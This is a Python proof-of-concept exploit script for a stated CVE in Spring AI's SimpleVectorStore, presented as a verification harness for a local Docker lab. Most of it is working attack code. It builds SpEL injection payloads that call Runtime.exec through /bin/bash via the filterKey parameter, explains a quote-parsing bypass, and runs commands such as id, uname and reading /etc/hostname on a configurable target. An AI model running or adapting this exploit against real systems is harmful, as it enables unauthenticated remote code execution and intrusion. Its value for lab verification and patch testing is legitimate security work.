#!/usr/bin/env python3
"""
CVE-2026-22738 — SpEL Injection RCE in Spring AI SimpleVectorStore
CVSS 9.8 CRITICAL | CWE-94 / CWE-917

Affected: org.springframework.ai:spring-ai-core 1.0.0–1.0.4, 1.1.0-M1–1.1.3
Fixed:    Spring AI 1.0.5 / 1.1.4 (commit ba9220b22383e430d5f801ce8e4fa01cf9e75f29)

This script is a verification harness for the accompanying local Docker lab.
Only run it against systems you own or are explicitly authorized to test.

Technique
─────────
SimpleVectorStore.similaritySearch() passes the user-supplied filter key name
verbatim into a SpEL template evaluated by StandardEvaluationContext.
StandardEvaluationContext exposes the full JVM reflection API, so injecting
T(java.lang.Runtime).getRuntime().exec(...) into the filter key achieves
unauthenticated OS command execution.

Key bypass detail (from exploit research):
  • Naïve single-quote injection fails because the filter text parser treats a
    key starting with ' as a quoted string and strips the outer quotes.
  • Wrapping the payload in double quotes ("...") causes the parser to strip
    the outer double quotes, leaving the inner content (starting/ending with ')
    to be used verbatim as the SpEL key via #metadata[''].
  • Using #metadata[''] on both sides (instead of undefined foo[...]) avoids an
    "unknown variable" SpEL error while still triggering exec().

Success indicator:
  • HTTP response body contains "EL1030E" — the SpEL runtime error
    "operator ADD not supported between null and java.lang.ProcessImpl".
    This error is raised AFTER exec() returns, confirming OS-level execution.

Usage
─────
    pip install requests
    python3 exploit.py [--target http://localhost:8082] [--wait]

For Docker Desktop (macOS/Windows) callback payloads, use host.docker.internal
instead of 127.0.0.1 as the callback IP.
"""

import argparse
import subprocess
import sys
import time
from typing import List, Optional

try:
    import requests
except ImportError:
    # Do not exit at import time: that would make the module impossible to
    # import (e.g. to unit-test the pure payload helpers).  main() performs the
    # check and exits with the same message and status code as before.
    requests = None

# ── Constants ──────────────────────────────────────────────────────────────────
CONTAINER_NAME = "cve-2026-22738-lab"  # must match docker-compose container_name
PROOF_FILE = "/tmp/pwned_cve_2026_22738"
RCE_PROOF_FILE = "/tmp/rce_proof.txt"

# SpEL error raised after exec() returns — reliable OOB-free confirmation of RCE
RCE_INDICATOR = "EL1030E"

# Per-request timeout (seconds) shared by every exploit step.
REQUEST_TIMEOUT_S = 15

# The banner box is assembled programmatically so the right-hand border always
# lines up, whatever text the rows contain.
_BANNER_INNER_WIDTH = 66
_BANNER_ROWS = (
    "CVE-2026-22738 — Spring AI SpEL Injection → RCE",
    "CVSS 9.8 CRITICAL | No Auth | No Interaction",
    "Affected: Spring AI 1.0.0–1.0.4, 1.1.0-M1–1.1.3",
)
BANNER = "\n" + "\n".join(
    ["╔" + "═" * _BANNER_INNER_WIDTH + "╗"]
    + ["║" + (" " + row).ljust(_BANNER_INNER_WIDTH) + "║" for row in _BANNER_ROWS]
    + ["╚" + "═" * _BANNER_INNER_WIDTH + "╝"]
)


# ── Payload helpers ────────────────────────────────────────────────────────────
def spel_filter_key(cmd: str) -> str:
    """
    Build the SpEL injection filterKey parameter value.

    The application concatenates filterKey into the filter expression string:
        filterExpr = filterKey + " == '" + filterValue + "'"

    With our payload the expression becomes:
        "'] + T(java.lang.Runtime).getRuntime().exec(new String[]{...}) + #metadata['" == 'x'

    The filter text parser strips the outer double-quotes and passes the inner
    content to doKey(), which embeds it into:
        #metadata[''] + T(java.lang.Runtime)...exec(...) + #metadata[''] == 'x'

    StandardEvaluationContext evaluates this, exec() fires, then SpEL throws
    EL1030E (can't ADD null + ProcessImpl) — that error is our success indicator.

    IMPORTANT: cmd must not contain single quotes (they would break the SpEL
    string). For commands with single-quoted arguments, base64-encode and
    decode inline.

    Args:
        cmd: Shell command line handed to ``/bin/bash -c`` inside the target.

    Returns:
        The string to send as the ``filterKey`` query parameter.
    """
    return (
        f'''"'] + T(java.lang.Runtime).getRuntime().exec('''
        f'''new String[]{{'/bin/bash','-c','{cmd}'}}) + #metadata['"'''
    )


def spel_read_property(prop: str) -> str:
    """Blind probe payload — reads a JVM system property (no OS exec needed).

    Args:
        prop: Name of the JVM system property, e.g. ``"java.version"``.

    Returns:
        The string to send as the ``filterKey`` query parameter.
    """
    return f'''"'] + T(java.lang.System).getProperty('{prop}') + #metadata['"'''


# ── HTTP helper ────────────────────────────────────────────────────────────────
def _search(
    session: "requests.Session",
    target: str,
    filter_key: str,
    filter_value: str = "x",
) -> "Optional[requests.Response]":
    """GET ``{target}/search`` with the given filter; return None on transport failure.

    Centralising the request means every step handles refused connections and
    timeouts the same way instead of crashing with a traceback.
    """
    try:
        return session.get(
            f"{target}/search",
            params={"filterKey": filter_key, "filterValue": filter_value, "query": "hello"},
            timeout=REQUEST_TIMEOUT_S,
        )
    except requests.ConnectionError as e:
        print(f" ✗ Connection refused: {e}")
    except requests.RequestException as e:
        # Timeouts, invalid URLs, too many redirects, …
        print(f" ✗ Request failed: {e}")
    return None


# ── Individual exploit steps ───────────────────────────────────────────────────
def step_baseline(session: "requests.Session", target: str) -> bool:
    """Step 1 — confirm the endpoint is reachable and the seeded document is returned.

    Returns:
        True when the endpoint answers HTTP 200 and the body contains one of
        the markers "country", "US" or "Hello"; False otherwise (including on
        any transport error).
    """
    print("\n[*] Step 1 — Baseline check (filterKey=country, filterValue=US)")
    resp = _search(session, target, "country", "US")
    if resp is None:
        return False

    body = resp.text
    if resp.status_code == 200 and any(marker in body for marker in ("country", "US", "Hello")):
        print(f" ✓ Endpoint reachable — seeded document returned (HTTP {resp.status_code})")
        return True

    print(f" ✗ Unexpected response (HTTP {resp.status_code}): {body[:300]}")
    return False


def step_spel_probe(session: "requests.Session", target: str) -> bool:
    """Step 2 — blind SpEL probe to confirm the injection point is reached.

    Returns:
        True when the server answers HTTP 200 or 500; False on any other
        status or on a transport error.
    """
    print("\n[*] Step 2 — SpEL probe (read java.version via T(java.lang.System))")
    resp = _search(session, target, spel_read_property("java.version"))
    if resp is None:
        return False

    # SpEL evaluation error (500) or clean response (200) — both confirm evaluation happened
    if resp.status_code in (200, 500):
        print(f" ✓ SpEL expression reached the evaluator (HTTP {resp.status_code})")
        # Heuristic only: these substrings are not proof the property was echoed.
        if "21" in resp.text or "17" in resp.text or "java" in resp.text.lower():
            print(" ✓ Java version string visible in response body")
        return True

    print(f" ? Unexpected status {resp.status_code}: {resp.text[:200]}")
    return False


def step_rce_touch(session: "requests.Session", target: str) -> bool:
    """Step 3 — RCE: create /tmp/pwned_cve_2026_22738 inside the container.

    Returns:
        True when the response contains ``RCE_INDICATOR`` or, as a best-effort
        fallback, when the server answers HTTP 500. False otherwise (including
        on a transport error).
    """
    print(f"\n[*] Step 3 — RCE: touch {PROOF_FILE}")
    resp = _search(session, target, spel_filter_key(f"touch {PROOF_FILE}"))
    if resp is None:
        return False

    if RCE_INDICATOR in resp.text:
        print(f" ✓ {RCE_INDICATOR} in response — Runtime.exec() was invoked (process spawned)")
        return True

    print(f" ? Response (HTTP {resp.status_code}): {resp.text[:300]}")
    # Still return True if we get a 500 with any error — execution may have happened
    return resp.status_code == 500


def step_rce_id(session: "requests.Session", target: str) -> bool:
    """Step 4 — RCE: write id/uname/hostname to /tmp/rce_proof.txt.

    Returns:
        True only when the response contains ``RCE_INDICATOR``.
    """
    print(f"\n[*] Step 4 — RCE: capture id + uname + hostname → {RCE_PROOF_FILE}")
    # Chained commands — must not use single quotes inside the payload
    cmd = (
        f"id > {RCE_PROOF_FILE} && "
        f"uname -a >> {RCE_PROOF_FILE} && "
        f"cat /etc/hostname >> {RCE_PROOF_FILE}"
    )
    resp = _search(session, target, spel_filter_key(cmd))
    if resp is None:
        return False

    if RCE_INDICATOR in resp.text:
        print(f" ✓ {RCE_INDICATOR} detected — command dispatched")
        return True

    print(f" ? HTTP {resp.status_code}: {resp.text[:200]}")
    return False


def _docker_exec(argv: List[str], *, timeout_msg: str) -> "Optional[subprocess.CompletedProcess]":
    """Run ``docker exec CONTAINER_NAME argv…``; return None if docker is unusable.

    Args:
        argv: Command and arguments to run inside the container.
        timeout_msg: Line printed when the call exceeds its 10 s timeout.
    """
    try:
        return subprocess.run(
            ["docker", "exec", CONTAINER_NAME, *argv],
            capture_output=True,
            text=True,
            timeout=10,
        )
    except FileNotFoundError:
        print(" ! 'docker' binary not in PATH — skipping file check")
    except subprocess.TimeoutExpired:
        print(timeout_msg)
    return None


def step_verify_docker() -> bool:
    """Step 5 — read proof files from inside the container via docker exec.

    Returns:
        True when ``RCE_PROOF_FILE`` could be read and contains ``"uid="``;
        False when docker is unavailable, times out, or the file is missing
        or empty. The presence check of ``PROOF_FILE`` is informational only.
    """
    print("\n[*] Step 5 — Verifying via docker exec")
    time.sleep(1)  # give the spawned bash process a moment to finish writing

    # ── Check the touch file ──────────────────────────────────────────────────
    listing = _docker_exec(["ls", "-la", PROOF_FILE], timeout_msg=" ! docker exec timed out")
    if listing is None:
        return False
    if listing.returncode == 0:
        print(f" ✓ Proof file present: {listing.stdout.strip()}")
    else:
        print(f" ✗ Proof file missing: {listing.stderr.strip()}")

    # ── Read id / uname output ────────────────────────────────────────────────
    proof = _docker_exec(
        ["cat", RCE_PROOF_FILE],
        timeout_msg=" ! docker exec timed out while reading proof file",
    )
    if proof is None:
        return False

    output = proof.stdout.strip()
    if proof.returncode != 0 or not output:
        print(f" ✗ Could not read {RCE_PROOF_FILE}: {proof.stderr.strip()}")
        return False

    rule = "=" * 62
    print(f"\n{rule}")
    print(" RCE PROOF (executed inside the container):")
    print(rule)
    for line in output.splitlines():
        print(f" {line}")
    print(rule)
    return "uid=" in proof.stdout


# ── Main ───────────────────────────────────────────────────────────────────────
def wait_for_ready(target: str, timeout_s: int = 120) -> bool:
    """Poll /search?filterKey=country&filterValue=US until the app responds (or timeout).

    Args:
        target: Base URL of the application, without a trailing slash.
        timeout_s: Maximum number of seconds to keep polling.

    Returns:
        True as soon as the endpoint answers HTTP 200 or 500; False if the
        deadline passes first.
    """
    # monotonic() is immune to wall-clock adjustments during the wait.
    deadline = time.monotonic() + timeout_s
    print(f"[*] Waiting for app to be ready at {target} (up to {timeout_s}s) …", end="", flush=True)
    while time.monotonic() < deadline:
        try:
            r = requests.get(
                f"{target}/search",
                params={"filterKey": "country", "filterValue": "US"},
                timeout=5,
            )
        except requests.RequestException:
            # Expected while the container is still booting — keep polling.
            # Anything else (a programming error) is allowed to propagate.
            r = None
        if r is not None and r.status_code in (200, 500):
            print(" ready!")
            return True
        print(".", end="", flush=True)
        time.sleep(3)
    print(" TIMEOUT")
    return False


def main():
    """Parse CLI arguments, run the five steps in order and print a verdict.

    Exits with status 1 when ``requests`` is not installed, when ``--wait``
    times out, or when the baseline check fails.
    """
    if requests is None:
        print("[!] Missing dependency — run: pip install requests")
        sys.exit(1)

    parser = argparse.ArgumentParser(
        description="CVE-2026-22738 PoC — SpEL RCE in Spring AI SimpleVectorStore"
    )
    parser.add_argument(
        "--target",
        default="http://localhost:8082",
        help="Base URL of the vulnerable app (default: http://localhost:8082). "
             "Inside Docker use http://host.docker.internal:8082",
    )
    parser.add_argument(
        "--wait",
        action="store_true",
        help="Poll the target until it is ready before exploiting (useful right after 'docker compose up')",
    )
    args = parser.parse_args()
    target = args.target.rstrip("/")

    print(BANNER)
    print(f"Target: {target}\n")

    session = requests.Session()

    if args.wait and not wait_for_ready(target):
        print("[!] Target never became ready. Exiting.")
        sys.exit(1)

    # ── Run steps ─────────────────────────────────────────────────────────────
    if not step_baseline(session, target):
        print("\n[!] Baseline failed — is the container running?")
        print(" Try: docker compose up -d --build (then retry with --wait)")
        sys.exit(1)

    step_spel_probe(session, target)
    touch_ok = step_rce_touch(session, target)
    id_ok = step_rce_id(session, target)
    verified = step_verify_docker()

    # Either exec step signalling success counts as a server-side indication.
    rce_ok = touch_ok or id_ok

    # ── Final verdict ─────────────────────────────────────────────────────────
    # Wording is limited to what was actually observed: the executing user is
    # shown in the proof output rather than asserted here.
    print()
    if rce_ok and verified:
        print("✅ EXPLOIT SUCCEEDED — full unauthenticated RCE confirmed (see id output above)")
    elif rce_ok:
        print("⚠️ EXPLOIT LIKELY SUCCEEDED — server response indicates execution, "
              "but docker verification was skipped or failed")
        print(f" Manual check: docker exec {CONTAINER_NAME} cat {RCE_PROOF_FILE}")
    else:
        print("❌ EXPLOIT FAILED — check that the target is running Spring AI "
              "1.0.0–1.0.4 or 1.1.0-M1–1.1.3")


if __name__ == "__main__":
    main()